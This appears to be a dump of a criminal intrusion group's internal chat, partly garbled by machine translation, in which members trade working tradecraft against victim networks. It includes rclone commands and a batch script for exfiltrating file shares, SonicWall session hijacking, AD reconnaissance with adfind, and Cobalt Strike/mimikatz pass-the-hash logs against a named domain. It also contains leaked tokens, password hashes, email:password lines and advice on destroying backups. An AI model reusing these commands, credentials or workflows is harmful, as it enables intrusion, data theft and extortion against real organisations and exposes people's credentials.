MSIX-Skype for Desktop/live:dudurech90_1\live:dudurech90_1 7b 22 72 61 77 54 6f 6b 65 6e 22 3a 22 65 79 4a 68 62 47 63 69 4f 69 4a 53 55 7a 49 31 4e 69 49 73 49 6d 74 70 5a 43 49 36 49 6a 45 77 4d 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 70 59 58 51 69 4f 6a 45 32 4d 44 6b 77 4e 6a 63 34 4d 6a 59 73 49 6d 56 34 63 43 49 36 4d 54 59 77 4f 54 45 31 4e 44 49 79 4e 53 77 69 63 32 74 35 63 47 56 70 5a 43 49 36 49 6d 78 70 64 6d 55 36 5a 48 56 6b 64 58 4a 6c 59 32 67 35 4d 46 38 78 49 69 77 69 63 32 4e 77 49 6a 6f 35 4e 54 59 73 49 6d 4e 7a 61 53 49 36 49 6a 45 32 4d 44 6b 77 4e 6a 63 34 4d 6a 55 69 4c 43 4a 6a 61 57 51 69 4f 69 49 7a 5a 47 55 79 4f 47 51 35 4f 44 63 7a 4d 54 4d 78 59 6d 55 31 49 69 77 69 59 57 46 30 49 6a 6f 78 4e 6a 41 32 4f 54 4d 79 4d 44 49 35 66 51 2e 52 71 53 75 7a 74 32 77 51 65 4a 79 4d 51 69 5f 78 68 6e 62 79 68 47 35 62 59 38 30 66 6b 4b 58 67 7a 42 68 54 79 73 64 42 66 68 30 5a 34 32 66 48 57 4a 4c 57 58 6d 76 65 54 4d 5f 67 48 32 58 42 4f 4a 61 6c 32 6d 76 46 34 71 61 67 55 76 57 46 70 42 31 2d 61 65 6f 63 4b 2d 49 66 58 34 41 4b 70 4c 54 5a 43 30 73 37 4d 48 32 52 30 73 44 49 78 6c 4b 4c 6e 33 68 77 34 57 46 7a 56 74 4d 4b 70 55 67 47 58 69 37 65 53 55 50 65 37 39 44 53 65 59 52 55 7a 37 46 59 49 41 68 36 4d 71 75 6c 6f 41 5f 37 4f 6c 76 4b 66 6b 6a 46 69 39 55 49 32 30 45 6c 67 70 32 59 6e 6a 4d 71 37 52 72 63 54 49 76 4d 51 68 6e 79 33 70 32 6b 51 46 6a 6e 6e 78 4d 30 68 4a 75 6e 79 66 53 6d 69 38 33 63 38 46 52 4a 31 37 6b 4f 42 53 6b 2d 69 62 63 34 36 47 30 79 71 37 59 4b 76 79 74 6e 62 56 31 4f 74 42 4e 4c 41 54 4d 63 75 4d 48 59 48 68 5a 6d 74 44 39 4c 68 42 4a 61 50 6b 6e 4a 4f 6a 34 61 44 53 58 55 69 72 79 47 58 34 67 32 2d 68 46 5a 4c 4c 31 31 6f 44 67 76 77 41 36 69 50 67 4e 67 53 53 52 37 75 30 42 47 64 45 4f 72 47 71 4a 66 70 32 51 22 2c 22 65 78 70 69 72 61 74 69 6f 6e 22 3a 31 36 30 39 31 35 34 31 31 37 30 34 33 7d 00 00 00 00 00 can you extract the account from the sloud acronis agent?hi, if someone has difficulties with the lifting of the session through the rdp can try to drop me a line. so far only where there is rdp11 if memory serves zhava need try to put a normal password on the archive and change the file format, so it is not lit as an archive is not network technically can not
except to archive directly on the host where the logical drive is partitionedparni, is there any way not to spam network traffic when you make archives with the ball?
it's like one and the same, but they fuckin' spam the traffic, and in good corporations you can't make big archives for uploading. how to dump the base on a local server? who has faced with bases in azuer? chrome sees it, but writes about the certificate, the problem with the sonic does not see it through firefox, but through Edge does, I do not understand why...Hi, everybody. Please advise plz according to the manual SonicWall
Open incognito browser and open the console (i.e. the blank page initially, or should I go into sonic and enter the credentials?)
2. Encoding...(enter into console (>> btoa ("47ZjFKx24Nj2h2UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeDI0TmoyaDBVdFpLWDWDJPWW5aTGdSZZA1YVgyU3Vhb3RWenJRZz0=") with the replacement of the session and all?)@all Friends, the amount of shared experience exceeds the normal and structured storage, it was decided to raise a simple forum engine to publish there relevant guides and materials that we all have in the process.
A big request to everyone! At your leisure time - write to me to register, and after her - write there on the articles of some, on the subject of the LJ to decide who can what.
This forum will not be used as a chat-room, more as a storage and replenishment of the knowledge base, it will be useful to all, I have tried to divide the navigation of the topics and the approximate titles of the first articles outlined where we will port the material.

Take responsibility, you have no idea how many questions of the same type are asked of each other here every day! We can save a lot of time for ourselves and our colleagues! https://prnt.sc/yz4t49с March 3, he writes 55 backups every timehttp://prnt.sc/yz4fgi

this shit goes to the cloud? they also seem to be able to restore within 30 days no? should i look for an account or give up? @all who needs to rescan sonics - write within the hour to the relevant chatsIf the corp. google restores the deletion lust 30 days it's like if you take down gdrive, then all with endsIn my case i have a synology nas, it has claud sync to google drive, what options for deletion ? and does google restore deleted drive files ? @all can someone pass the session from the x64 car ? @all friends who are there free and without tasks, beep in PM I bet)toulouse by the way handy))) and not cna at all, does not integrate directly with the coba is it a script ?) https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
you mean this script?)hello everyone, who knows a cna script with these arguments?
>psexec [hostname] [share] [listener]@all write to anyone who needs a session to redo, right in the workplace on this case where you need freshThe question as above advised through ftp server on the dedicec, filezilla put 5 minutes, then through the clone pull, very surprised speed, 46 gb for an hour and a half did[ ] (https://stylebrooks.com/group/general?msg=5KZsucuYmrv24D8TX) found a version of this. if relevant scribble
5-10mbps really.
onyon back repurposed kekhoroshy analogue) I just rented a server at 32tb and there I download by ftpstalked that the case is limited to the use of mega, are there any other good analogues, preferably with btk payment ?yes, it will take some time to weigh all the same, won't it ?well thank you and that's it) you can somehow use wmik, the syntax would be correct da well, it's too long...see in the last line of the outaptu ``dir /s E:\YouDocs > log.txt
``How do I check the size of a certain folder?
dnscmd /enumzones > AllZones.txt
for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt
` `remember plyz command polling DNS with DC@all who needs 2fa re-transcribe to sonics? now really do if the log will not be then try the user to write it, from whom you start vmikflag -P plug in and add at the end >> C:\stat.logI was just interested in the statistics.
In any case, thank you.@lexman wait, but it's just start and check, without the ability to periodically see the statistics of the upload, as with the flag `-P`, right? I will add, before starting check that the system rights on the remote machine was enough to go to a given diRight, thanks.
The variant with wmic is also interesting, @lexmandaThe whole output will go into session, yes? `shell rclone.exe copy "\\host\F$" mega:/ -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P `all output into session. flag `-P `you use and all or ` --progress `Thanks! Yes I will explain in detail, please, or give example?
Perhaps others will also be useful.rklon command put in the baton, run through wmic
it worksGentlemen, is there any way to run rclone from bacon, and then periodically check the progress? https://www1.appliedsystems.com/en-us/resources/videos/applied-csr24/https://portal.csr24.com/ - has anyone come across? stewart can fill a bunch at once a free service for cracking hasheshttp://crackstation.net/sends backups to the cloud, in the account is a pass, but is there an option to get it? as in viamStorageCraft who decrypted the cracks?
SHUT UP AND TAKE ME FULL INFO!111 and 50 rows by 50 rows to query the tablesto watch the database then dump the clere pass will query all the msl servakina based noSpaaahohoro we need the combine to pump up not the fact that there is a webapp, or separately look for this webapp not clere dumps hashioni lie in clereveb the appa "writes" in the base in config[ ](https://stylebrooks.com/group/general?msg=eJuSrgKkk8W7Yumcy) hmmm
well if it's on gitecac i've already said it's a tricky way to do it
more options? yes, where is the target process on the DB server? where are the creeds? msf can dump sa creeds, i think there is a similar solution on the gitaskl management studio involves opening an rd on which you can palp
cobalt session - to catch a detec-tionadoado the easiest and safest option that do not palnutsya usually these crosses are in the configuration of web applicationswant to pump the manual can and not only her pollingI ask why is it MsSql admin account is certainly she has a crosses or what is where as the account is where to get it?so stopsqlcmd under the VPN)hhm on a remote hosta from under the VPN saysqlcmd under the account saaWhat options for polling the database has except
SQL Management Studio
hoisting the session and the injection in sqlservr ?@all those without cases - in pm+@all attention everyone, who needs to reset the session SonicWall have to work with today directly - write to the PM thank you I will try it thank youhttp://habr.com/ru/post/441166/
https://www.ise.io/casestudies/password-manager-hacking/кто can do something with the 1Password database?
foreach($line in Get-Content .\file.txt) {
    if($line -match $regex){
        # Work here
    }
}
``in the loop, for examplepowershell Get-WmiObject -Class win32_logicalDisk `-ComputerName IP ` | ft DeviceID, @{Name="Free Disk Space (GB)";e={$_.FreeSpace /1GB}}, @{Name="Total Disk Size (GB)";e={$_.Size /1GB}} -AutoSize
Can someone tell me how to specify the ip address file correctly, so I don't have to type them separated by commas?
tried : `(Get-Content C:\programdata\list.txt)` but it says it's wrong argument
output:
```
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">Get-WmiObject : Cannot validate argument on parameter 'ComputerName'. The argum_x000D__x000A_</S><S S="Error">ent is null or empty. Provide an argument that is not null or empty, and then t_x000D__x000A_</S><S S="Error">ry the command again._x000D__x000A_</S><S S="Error">At line:1 char:54_x000D__x000A_</S><S S="Error">+ Get-WmiObject -Class win32_logicaldisk -ComputerName (Get-Content c:\programd_x000D__x000A_</S><S S="Error">ata ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error">~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : InvalidData: (:) [Get-WmiObject], ParameterBindi _x000D__x000A_</S><S S="Error"> ngValidationException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.Power _x000D__x000A_</S><S S="Error"> Shell.Commands.GetWmiObjectCommand_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>
``[ ](https://stylebrooks.com/group/general?msg=S6Z34gLYgcgAwB5Hx) anybody rolled ? let me play :)thxxm ``
adfind.exe -b dc=domain,dc=local -f "(objectcategory=person)" > C:\Programdata\ad\domain\ad_users.txt
adfind.exe -b dc=domain,dc=local -f "objectcategory=computer" > C:\Programdata\ad\domain\ad_computers.txt
adfind.exe -b dc=domain,dc=local -f "(objectcategory=organizationalUnit)" > C:\Programdata\ad\domain\ad_ous.txt
adfind.exe -b dc=domain,dc=local -subnets -f (objectCategory=subnet)> C:\Programdata\ad\domain\subnets.txt
adfind.exe -b dc=domain,dc=local -f "(objectcategory=group)" > C:\Programdata\ad\domain\ad_group.txt
adfind.exe -b dc=domain,dc=local -gcb -sc trustdmp > C:\Programdata\ad\domain\trustdmp.txt
``trustanddmp ``nltest /trusted_domains ``remember the command to poll the trustdmp ? without a crude can be? from yes to one@alter what is the manual to hunt and drag terrabytes!
it's through the S3 repository implemented? o_unreal, alas, there's a battlefield here, who's rocket is cooler - and he wins, so we build rockets constantly)so it's not scary anymore)we have everything here and need constant support)through any channel of any software in theory, there are different ways to play in principle we have someone who writes
put the tz - let's make a simplea it's perl-likehttp://github.com/RhinoSecurityLabs/external_c2_frameworkhttps://www.cobaltstrike.com/help-externalc2https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/не, you do not understand a little
now show the detects well I still do not have time to figure it out - if you have the desire - better to dig in this direction then http://github.com/Und3rf10w/external_c2_framework
like this, but if you are interested - cobalt has external c2 and tacda, a complete framework@all
https://blog.dylan.codes/shad0w/
interesting enough "fresh" framework
if you have time and interest - i recommend to poke around, but viola correctly hinted that you can put the client on the remote with the VPN just[ ](https://stylebrooks.com/group/general?msg=H5q2v6pjgFTsWTMPQ) if you have crones, it's hard to answer, but i do not really understand why you need sox in this chain? why not open a VPN immediately with the right part?maybe there is some ssh access, where you can clean up with commands.i at least have not seen a two-factor on vmik or psehs try through wmiexec shell open and forti process put out if there Hyper-V by mikrosoft at least if you put out the hypervisor but you and all the virtuals it hosts will fall off, no? but let's know
sansp. no time. admin put out the internets on it kerberos tickets for example can be requested to get rights to shared resources this hash machine for SPN you after pth should do stiltoken this process :
```
| PID 17844
  | TID 8412
  | LSA Process is now R/W
```
which runs under the token you hackypants well if it is a live machine acct should work ... you can also try through the laughs, also should work
cme smb 127.0.0.1 -u TRUCAMTLBK4\$ -H c028fc26ba545c599adbb9b7e26964d1 -d trudeaucorp.como very defensible bekapseven in the brow here admin me worked 100% lm there whatev msf lm:ntlm suyumimik eats ntlm straight to kobena it is clear) lm:ntlmane?ntlm simpler sorta śhatakoy should be ntlmc028fc26ba545c599adbb9b7e26964d1:c028fc26ba545c599adbb9b7e26964d1msfom then all bypass everything try - /user:TRUCAMTLBK4\$.salt is what but I may not mimic the correct way ``
beacon> mimikatz sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1 command
[+] host called home, sent: 750703 bytes
[+] received output:
user : TRUCAMTLBK4$
domain : trudeaucorp.com
program : cmd.exe
impers. : no
NTLM : c028fc26ba545c599adbb9b7e26964d1
  | PID 17844
  | TID 8412
  | LSA Process is now R/W
  | LUID 1 ; 2572284471 (00000001:9951f237)
  \_ msv1_0 - data copy @ 000001CC19EF7DD0 : OK !
  \kerberos - data copy @ 000001CC1A834828
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000001CC17DA3948 (32) -> null

beacon> shell dir \\\TRUCAMTLBK4\c$
[*] Tasked beacon to run: dir \\\TRUCAMTLBK4\c$
[+] host called home, sent: 51 bytes
[+] received output:
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
``And the ptx how? So give me the hash of the machine and the login in TRUCAMTLBK4\$ format, you can safely stick it into the msf.
admin is very clever about hiding backups.
urgentonasar
have a domain
need access to the machine
will this work and how to get it right
We'll have to dump all the hashes
and try to authenticate with the machine hash
Target is TRUCAMTLBK4
hash
the output is
``9051 TRUCAMTLBK4$ c028fc26ba545c599adbb9b7e26964d1 528384
```
how do you shoehorn a hash \ token to start a machine? command\session at least my@all issproduce.co.uk remind me who has a mesh in work small etaschas look at what their data on the deed will press possible if the bookmark is or can create it fuckin coding thank you understandChoose from the tune of the admin? different if there remot app you must have the servers configuredHello guys all! Hey guys, advise Sonic, from the browser can fall in the RDP without a VPN connection?[ ](https://stylebrooks.com/group/discussion?msg=WmcxwRiXwBd3iiNFN) #general[ ](https://stylebrooks.com/group/discussion?msg=GpNTAMdKuF2W7ZctF) hmm, timeweaver also supports it? interesting ... someone posted how then you can pull sessions from vpn sonic software, no tips where it is? did not work to install as admin. had to install timeweaver host, then there is a separate idd to enter via lockscreen[ ](https://stylebrooks.com/group/discussion?msg=36KHjDQw4k6Tp5CwX) set
always with the enidisk you can turn on the tunnel to 3389 to your host and connect to localhost:3389People, how do I make timka or enidisk not cut off when leaving the rdpone, thank youSomething you can create, sometimes not
Not all polzak have bookmarks by default, here @Code was chekker cookies, try to rewrite and other polzak will be bookmarks or possibility to createprivet, you can try to create a webrp link yourself if there is such info from available Downloads | Options | Help | LogoutHello, advise please
SonicWall through the cookie, got access to the portal, but I do not see a link to webrdpok, thanks, alter asked to write to who is free timlid, I do not do anything yetATXGrimnir on the 2016 server dllka ran, everything okhtrs://dyncheck.com/scan/id/0e85df67f128617619f46255d62b1a1e
1/23
AhnLab V3 Light of some kind is giving dynamite detection checked on dyncheck dll x64 on 2008 crashes eheCodeocta0dayinbizhttps://dyncheck.com/scan/id/5b13716a94a301b0faef2dd60ef09b07#collapse_infoокточки input for dll

```
DllRegisterServer
DllInstall
DllUnregisterServer
Control_RunDLL
``@all working update
I think I need to test it on vin 10 and fix it on 7, same story on 12, same story with both folders tested on 2016 server x64 without AB
i also noticed the size of the dll itself increased 4 times compared to the dlls from the previous artifact
x64 as well as x86 is much better than previous artifact
360 Total Security Essential crashesChuсkWho had a normal update? @all update artifact whale, please test on dincek without internetnimbus2000 since there will not be a second onethere is no need to write here
gentlemen #teamleaders let those who understand poorly the first time understand @all gentlemen, friends and colleagues
I'm sick and tired of being a fucking babysitter for everyone
there is a very detailed report and the result of the downloaded data which WE all need for the trades to get the most out of the work
the next group that will ignore it will choose a responsible person who will be punished with a ruble or permanently excluded from the work process, everyone has a nerve - I have a lot, but I also have a limit of certain

I do not understand can not be inserted back or what? only by hand can be inserted? https://prnt.sc/106bra1кто with tapes strong? I can not erase tapes, mediawalt full, but I understand they are not in the drive, and they can not erase[ ](https://stylebrooks.com/group/discussion?msg=WiG3JRn38X4sLa6Lo) in Burp sox can exhibitGods, anyone Burp for proxy used? All happy holiday! Happy Holidays men! ahaha Happy Holiday ALL !!!)))Not lifted the right - not a man! =) Reciprocally) Happy Holidays, men! Happy Holidays, men! :) anyone decrypted the base mssql? Shusk Who has a normal left? @all update artifact of the whale, please test it on dincek without internetnimbus2000elefantkalinka interesting thing to look at
```
https://github.com/apenwarr/sshuttle
i will check it, thank you if you find it - put rukanin's ipi into the VPN adapter and you can tell the subdomains
there will be something like dns.companyname.com the corporation may have its own public dns server, google anything there ``Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>ipconfig /all

Windows IP Configuration

   Host Name ... ... ... : hub1
   Primary Dns Suffix ... . :
   Node Type . . . . . ♪ Hybrid ♪
   IP Routing Enabled. . . . No.
   WINS Proxy Enabled. .: No

Ethernet adapter Ethernet 4:

   Connection-specific DNS Suffix :
   Description . . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter

   Physical Address. . . . . : 00-09-0F-AA-00-01
   DHCP Enabled . . . . ♪ No ♪
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address . : fe80::19f3:f0f:c790:dc10%18(Preferred)
   IPv4 Address . . . . .: 10.212.134.200(Preferred)
   Subnet Mask . . . . : 255.255.255.255
   Default Gateway . . . . :
   DHCPv6 IAID . . . . . : 553650447
   DHCPv6 Client DUID . . . . : 00-01-00-01-27-E5-A9-A0-00-23-8B-CE-5F-E2

   DNS Servers ... ... ... : 8.8.8.8
                                       8.8.4.4
   NetBIOS over Tcpip. ♪ Enabled ♪

Ethernet adapter Ethernet 3:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . .: Fortinet Virtual Ethernet Adapter (NDIS 6
.30)
   Physical Address. . . . .: 00-09-0F-FE-00-01
   DHCP Enabled. . . . ♪ Yes ♪
   Autoconfiguration Enabled . .: Yes

Ethernet adapter Ethernet 2:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . ♪ Intel(R) PRO/1000 PM Network Connection ♪
   Physical Address . . . . : 00-23-8B-CE-5F-E3
   DHCP Enabled. . . . ♪ Yes ♪
   Autoconfiguration Enabled. .: Yes

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix :
   Description . . . . . . . : Intel(R) 82566DM-2 Gigabit Network Connec
tion
   Physical Address: . . . .: 00-23-8B-CE-5F-E2
   DHCP Enabled. . . . .: No
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address . : fe80::3852:1640:6cf4:bd25%12(Preferred)
   IPv4 Address . . . . : 23.92.208.98(Preferred)
   Subnet Mask . . . . : 255.255.255.252
   Default Gateway . . . . : 23.92.208.97
   DHCPv6 IAID . . . . : 301998987
   DHCPv6 Client DUID . . . . : 00-01-00-01-27-E5-A9-A0-00-23-8B-CE-5F-E2

   DNS Servers ... ... ... : 8.8.8.8
                                       8.8.4.4
   NetBIOS over Tcpip. ♪ Enabled ♪

Tunnel adapter isatap.{6A8A2F53-F893-4F8E-B941-CB9F7FF92A02}:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Microsoft ISATAP Adapter ♪
   Physical Address . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . .: Yes

Tunnel adapter 6TO4 Adapter:

   Connection-specific DNS Suffix :
   Description . . . . . . : Microsoft 6to4 Adapter
   Physical Address . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . . .: Yes
   IPv6 Address. . . . : 2002:175c:d062::175c:d062(Preferred)
   Default Gateway . . . . : 2002:c058:6301::1
                                       2002:c058:6301::c058:6301
   DHCPv6 IAID . . . . . : 452984832
   DHCPv6 Client DUID . . . . : 00-01-00-01-27-E5-A9-A0-00-23-8B-CE-5F-E2

   DNS Servers ... ... ... : 8.8.8.8
                                       8.8.4.4
   NetBIOS over Tcpip. ♪ Disabled ♪

Tunnel adapter isatap.{6260C4BD-FC56-488A-BF39-743C46AE9648}:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Microsoft ISATAP Adapter #2 ♪
   Physical Address . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . . .: Yes

C:\Users\Administrator>route /print

Manipulates network routing tables.

ROUTE [-f] [-p] [-4|-6] command [destination]
                  [MASK netmask] [gateway] [METRIC metric] [IF interface]

  -f Clears the routing tables of all gateway entries.  If this is
               used in conjunction with one of the commands, the tables are
               cleared prior to running the command.

  -p When used with the ADD command, makes a route persistent across
               boots of the system. By default, routes are not preserved
               when the system is restarted. Ignored for all other commands,
               which always affect the appropriate persistent routes.

  -4 Force using IPv4.

  -6 Force using IPv6.

  command One of these:
                 PRINT Prints a route
                 ADD Adds a route
                 DELETE Deletes a route
                 CHANGE Modifies an existing route
  destination Specifies the host.
  MASK Specifies that the next parameter is the 'netmask' value.
  netmask Specifies a subnet mask value for this route entry.
               If not specified, it defaults to 255.255.255.255.
  gateway Specifies the gateway.
  interface the interface number for the specified route.
  METRIC specifies the metric, ie. cost for the destination.

All symbolic names used for destination are looked up in the network database
file NETWORKS. The symbolic names for gateway are looked up in the host name
database file HOSTS.

If the command is PRINT or DELETE. Destination or gateway can be a wildcard,
(wildcard is specified as a star '*'), or the gateway argument may be omitted.

If Dest contains a * or ?, it is treated as a shell pattern, and only
matching destination routes are printed. The '*' matches any string,
and '?' matches any one char. Examples: 157.*.1, 157.*, 127.*, *224*.

Pattern match is only allowed in PRINT command.
Diagnostic Notes:
    Invalid MASK generates an error, that is when (DEST & MASK) != DEST.
    Example> route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1 IF 1
             The route addition failed: The specified mask parameter is invalid.
 (Destination & Mask) != Destination.

Examples:

    > route PRINT
    > route PRINT -4
    > route PRINT -6
    > route PRINT 157* .... Only prints those matching 157*

    > route ADD 157.0.0.0 MASK 255.0.0.0 157.55.80.1 METRIC 3 IF 2
             destination^ ^mask ^gateway metric^ ^
                                                         Interface^
      If IF is not given, it tries to find the best interface for a given
      gateway.
    > route ADD 3ffe::/32 3ffe::1

    > route CHANGE 157.0.0.0 MASK 255.0.0.0 157.55.80.5 METRIC 2 IF 2

      CHANGE is used to modify gateway and/or metric only.

    > route DELETE 157.0.0.0
    > route DELETE 3ffe::/32

C:\Users\Administrator>route print
===========================================================================
Interface List
 18...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter
 17...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30)
 13...00 23 8b ce 5f e3 ......Intel(R) PRO/1000 PM Network Connection
 12...00 23 8b ce 5f e2 ......Intel(R) 82566DM-2 Gigabit Network Connection
  1...........................Software Loopback Interface 1
 14...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
 15...00 00 00 00 00 00 e0 Microsoft 6to4 Adapter
 45...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
          0.0.0.0 0.0.0.0 23.92.208.97 23.92.208.98 40
   10.212.134.200 255.255.255.255 On-link 10.212.134.200 257
     23.92.208.96 255.255.255.255.252 On-link 23.92.208.98 276
     23.92.208.98 255.255.255.255.255 On-link 23.92.208.98 276
     23.92.208.99 255.255.255.255.255 On-link 23.92.208.98 276
        127.0.0.0.0 255.0.0.0 On-link 127.0.0.1 306
        127.0.0.1 255.255.255.255.255 On-link 127.0.0.1 306
  127.255.255.255.255.255.255.255 On-link 127.0.0.1 306
      192.168.1.0 255.255.255.0 10.212.134.201 10.212.134.200 1
   199.192.183.66 255.255.255.255 23.92.208.97 23.92.208.98 20
        224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
        224.0.0.0.0 240.0.0.0 On-link 23.92.208.98 276
        224.0.0.0.0 240.0.0.0 On-link 10.212.134.200 257
  255.255.255.255.255.255.255.255 On-link 127.0.0.1 306
  255.255.255.255.255.255.255.255 On-link 23.92.208.98 276
  255.255.255.255.255.255.255.255.255 On-link 10.212.134.200 257
===========================================================================
Persistent Routes:
  Network Address Netmask Gateway Address Metric
          0.0.0.0 0.0.0.0 23.92.208.97 20
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination Gateway
 15 1026 ::/0 2002:c058:6301::1
 15 1041 ::/0 2002:c058:6301::c058:6301
  1 306 ::1/128 On-link
 15 1010 2002::/16 On-link
 15 266 2002:175c:d062::175c:d062/128
                                    On-link
 12 276 fe80::/64 On-link
 18 261 fe80::/64 On-link
 18 261 fe80::19f3:f0f:c790:dc10/128
                                    On-link
 12,276 fe80::3852:1640:6cf4:bd25/128
                                    On-link
  1 306 ff00::/8 On-link
 12 276 ff00::/8 On-link
 18,261 ff00::/8 On-link
===========================================================================
Persistent Routes:
  None

C:\Users\Administrator>
``ipconfig /all local subnets or what? What to scan? Men, who has any ideas?[ ](https://stylebrooks.com/group/general?msg=6hvXr8S7ES64vC8qH) on the git in the manual says it could be easier
python -m pip install
but easier could be
python -m pip install impacket from the downloaded release folder, not the master branch

It may complain next that there is no readline module
pip install pyreadline

and in general, to access python not through the path, but through a variable, when installing python, you need to add python as a system variable (just check the box when installing)
it's all if the wind to install, on the lin say just downloaded from the git and everything works (on the disk inside the network do not drop, only from under soks or vpn with his vpska) https://github.com/maaaaz/impacket-examples-windowsимпакет not install what you have a problem? yesecretsdump that? well, yes, let) here is the link to the original source, as I understand, based on which is written about ms chachhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-sofar, wandering around our forum and came across a thing called ms chach, did anyone manage to run a python script that pulls the necessary information ? or can anyone have a chance to quickly remove the information? at least in the logs of the backups Job done there in the logs should be visible address of the panel try to turn on the log of network connectionsGod, good day all.
Perhaps someone has experienced something similar, will be able to suggest something.
All servers in the network have a folder `C:\ProgramData\Veeam\Backup`, where daily log files such as `VeeamGuestHelper_13082021.log` are stored, but I can not find the veeam anywhere.

i advise to set it to 5, with 9 it may take a long fucking time to compress.
plus add the password to the archive as an argument, it will be fucked upYou guys, I want to share with you a useful batch file, it runs through the sphere and adds the files suitable for the date condition + creates a file with a listing of archived files and adds it to the archive, you specify your info for work:
share - path to the balloon
z7a - path to the console 7zip exeştion.
archive - path and name of the future archive
mindate - minimum date of the file for archiving
diskword - the letter to mount the balloon fs (must be free)
compres - compression level.
*For the batch file to work, the Temp folder must be in C:\ProgramData\Temp)
**Paths to the archiver and to the archive to be created must be without spaces
***Leave all quotation marks in their place.)

save it as share.bat upload it to the server and run it through shell share.bat

Minimal automation for those who drag the data =)
```
set share="\\COMPUTER.domain.com\ShareName"
set z7a=C:\ProgramData\Temp\7za.exe
set archive=C:\ProgramData\Temp\NameOfNewArchive.7za
set mindate=+01/01/2020
set diskword=L:
set compres=-mx9
net use %diskword% %share%
forfiles /P %diskword%\ /S /C "cmd /c if @isdir==FALSE (\"%z7a%\" a %compres% \"%archive%\" @path)" /D %mindate%
forfiles /P %diskword%\ /S /C "cmd /c if @isdir==FALSE (echo @path >> C:\ProgramData\Temp\full_listing.txt)" /D %mindate%
"%z7a%" a %compres% "%archive%" C:\ProgramData\Temp\full_listing.txt
del C:\ProgramData\Temp\full_listing.txt
net use * /delete /y
``try``
Lucy:Sandoval:lev.menche.dochilov@list.ru:43BNbN97t1:O586wuQt
Paula:White:maks.korelov.87@bk.ru:nsR2Zdtx7x:49Jxo7A4
Jennifer:Foster:vesta.verenikina.90@mail.ru:99zjZ0F2Ow:CmynWwK2f
``To see info about majors in the company don't anyone have aka linkdin?
https://github.com/RythmStick/AMSITrigger
```
If anyone needs it on pshMail Sniper is a penetration testing tool to search for certain terms (passwords, insider information, network architecture information, etc) in the Microsoft Exchange environment via e-mail. It can be used either by a non-administrative user to search their own email, or by an Exchange administrator to search each user's mailbox in the domain.https://github.com/dafthack/MailSniper
https://9ba3de57-a-7faedcf5-s-sites.googlegroups.com/a/dafthack.com/dafthack/files/MailSniper-Field-Manual.pdf?attachauth=ANoY7cqDYNjE450gUhLsz7fxOdURq-1NQLB1FQibqTfEFG1SgQuMACmqcMxG42wtlOu1m3rLkQ1WfTR95mv1TilYvRskUwTtgS8qrjUWvzVjb-3PLYinJy0yI9qmLw_f2dbzktbxyOCCTQTSEwubyxtD24HLIgTmsTONnKKc6OTBMY92xZo5Uyai_bhojd5j9dNp3cznrSCNysokMUnmyOM30ulPi8pmEBBJC50vsghmgzzTvmWXQ24%3D&attredirects=0у i'm fine last night re-launched is everyone's chat is glitchy today? @steven ay thanks uncle !
8a62184e246b79c307a84ab75de6083b:Zgmegcgb1973201
``Thank you broda hi@steven hello uncle. Can you help) ?  
```8a62184e246b79c307a84ab75de6083b
``Does anyone have a multidomain case in the works and can shoot me a session from there?
it's fucking software.
with the fucked-up owners
and adverts 12 year olds made by some schoolboy what safe mods
